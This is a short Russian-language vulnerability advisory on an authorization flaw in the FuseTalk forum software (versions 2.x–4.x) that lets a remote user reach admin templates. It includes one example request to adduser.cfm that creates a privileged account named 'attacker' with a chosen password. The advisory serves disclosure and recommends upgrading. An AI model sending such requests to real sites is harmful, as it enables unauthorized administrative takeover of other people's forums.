Неавторизованный доступ в FuseTalk

Дата публикации:
07.05.2004
Дата изменения:
14.03.2009
Всего просмотров:
1198
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Обход ограничений безопасности
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
FuseTalk 2.x
FuseTalk 3.x
FuseTalk 4.x
Уязвимые версии: FuseTalk 4.0

Описание: Уязвимость в проверке правильности обнаружена в FuseTalk. Удаленный пользователь может получить доступ к административному интерфейсу.

Удаленный пользователь может получить доступ к 'banning.cfm' шаблону и заблокировать других пользователей. Пример:

http://[target]/admin/adduser.cfm?FTVAR_FIRSTNAME FRM=God&FTVAR_LASTNAMEFRM=God
&FTVAR_EMAILADDRESSFRM=Attacker@acker.com&FTVAR_USERNAMEFRM=attacker&FTVAR_PASSWORDFRM=coolpass
&FTVAR_PASSWORD2FRM=coolpass&FTVAR_USERFOR UMSFRM=0&FTVAR_USERTYPEFRM=g
&FTVAR_USERLEVELFRM=0&FTVAR_STATUSFRM=1&FTVAR_CITYFRM=&FTVAR_STATEFRM=70
&FTVAR_COUNTRYFRM=36&FTVAR_SCRIPTRUN=self.close%28%29%3B&FTVAR_RET URNERROR=Yes
&FT_ACTION=adduser

URL производителя:http://www.fusetalk.com/

Решение:Установите последнюю версию программы.

Ссылки: Fuse Talk Vunerabilities

или введите имя

CAPTCHA